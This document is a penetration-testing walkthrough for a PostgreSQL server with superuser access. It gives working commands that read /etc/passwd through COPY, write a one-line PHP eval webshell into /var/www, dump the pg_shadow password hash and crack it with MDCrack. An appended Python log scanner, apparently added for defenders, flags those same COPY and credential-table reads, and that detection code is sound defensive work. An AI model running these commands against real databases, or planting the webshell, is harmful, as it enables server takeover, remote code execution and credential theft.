1. Read files through COPY
mickey@pentest:~/Pentest/crack/mdcrack$ psql -h 127.0.0.1 -U postgres
Password for user postgres:
psql (8.4.2)
SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)
Type "help" for help.
postgres=# create table file (line text);
CREATE TABLE
postgres=# copy file from '/etc/passwd' with delimiter ':';
ERROR:  extra data after last expected column
CONTEXT:  COPY file, line 1: "root:x:0:0:root:/bin/bash"
This fails because of the delimiter: if the file being read contains the delimiter given to COPY, the rows split into more columns than the table has and the import is rejected. A delimiter that does not occur in the file has to be chosen instead:
postgres=# create table file (line text);
CREATE TABLE
postgres=# copy file from '/etc/passwd' with delimiter E'';
COPY 47
postgres=# select * from file;
This time it succeeds. Using pg_read_file() instead is impractical in a real engagement, because the directories it may read from are restricted.
2. Write a one-line webshell to the web directory
postgres=# create table file (line text);
CREATE TABLE
postgres=# insert into file values (E'<?php eval($_POST[mickey]);?>');
INSERT 0 1
postgres=# copy file (line) to '/var/www/one.php';
COPY 1
3. Crack the database account
postgres=# SELECT usename, passwd FROM pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 postgres | md518d0d1643114d8b58e27c77600a1c658
(1 row)
The stored value is md5(password + username), prefixed with the literal string "md5". In this example the password is mickey and the username is postgres, so the string that gets hashed is mickeypostgres and its MD5 digest is 18d0d1643114d8b58e27c77600a1c658.
The hash can be cracked with MDCrack, appending the username to each candidate password:
mickey@pentest:~/Pentest/crack/mdcrack$ wine MDCrack-sse.exe --algorithm=MD5 --append=s 18d0d1643114d8b58e27c77600a1c658
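All three steps above leave a trace in the PostgreSQL statement log. As a defender's counterpart, here is an added example (not part of the original post) that scans statement-log lines for server-side COPY to or from a file path and for reads of pg_shadow; it assumes log_statement = 'all' with a log_line_prefix of '%m [%p] %u@%d ', the sample log lines are constructed, and it also flags COPY ... PROGRAM, pg_authid and pg_read_file(), which go slightly beyond what the post shows.

```python
import re

# Constructed sample in PostgreSQL log format with log_statement = 'all' and
# log_line_prefix = '%m [%p] %u@%d '; these lines are made up, not from a real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 UTC [1201] postgres@postgres LOG:  statement: create table file (line text);
2024-01-01 10:00:02 UTC [1201] postgres@postgres LOG:  statement: copy file from '/etc/passwd' with delimiter ':';
2024-01-01 10:00:02 UTC [1201] postgres@postgres ERROR:  extra data after last expected column
2024-01-01 10:00:09 UTC [1201] postgres@postgres LOG:  statement: copy file (line) to '/var/www/one.php';
2024-01-01 10:00:15 UTC [1305] app@shop LOG:  statement: COPY orders FROM STDIN;
2024-01-01 10:00:20 UTC [1305] app@shop LOG:  statement: COPY (SELECT * FROM orders) TO STDOUT;
2024-01-01 10:00:30 UTC [1201] postgres@postgres LOG:  statement: SELECT usename, passwd FROM pg_shadow;
"""

# Only "LOG:  statement:" lines carry SQL; ERROR/CONTEXT lines are skipped.
STATEMENT_RE = re.compile(r"^\S+ \S+ \S+ \[\d+\] (?P<user>[^@\s]+)@(?P<db>\S+) LOG:\s+statement: (?P<sql>.*)$")
# Server-side COPY names a quoted file path (or PROGRAM) after FROM/TO; the client
# forms COPY FROM STDIN / TO STDOUT carry no quoted path and do not match.
FILE_COPY_RE = re.compile(r"\bCOPY\b.*?\b(?P<dir>FROM|TO)\s+(?:PROGRAM\s+)?'(?P<path>[^']+)'", re.I | re.S)
# Reads of stored password hashes, or of server files via pg_read_file().
CRED_RE = re.compile(r"\bpg_shadow\b|\bpg_authid\b|\bpg_read_file\s*\(", re.I)


def classify(sql):
    """Return (rule, path) for a suspicious statement, or None for a benign one."""
    m = FILE_COPY_RE.search(sql)
    if m:
        rule = "copy_file_read" if m.group("dir").upper() == "FROM" else "copy_file_write"
        return rule, m.group("path")
    if CRED_RE.search(sql):
        return "credential_table_read", None
    return None


def scan_log(text):
    """Return one finding dict per suspicious statement, in log order."""
    findings = []
    for line in text.splitlines():
        m = STATEMENT_RE.match(line)
        hit = classify(m.group("sql")) if m else None
        if hit:
            findings.append({"user": m.group("user"), "db": m.group("db"),
                             "rule": hit[0], "path": hit[1], "sql": m.group("sql")})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['rule']:22} {f['user']}@{f['db']:10} {f['path'] or '-':20} {f['sql']}")
```

Pair this with log_statement = 'all' (or at least 'ddl' plus auditing of superuser sessions) and a review of which roles hold superuser or pg_read_server_files / pg_write_server_files, since only those can run the server-side COPY forms the post relies on.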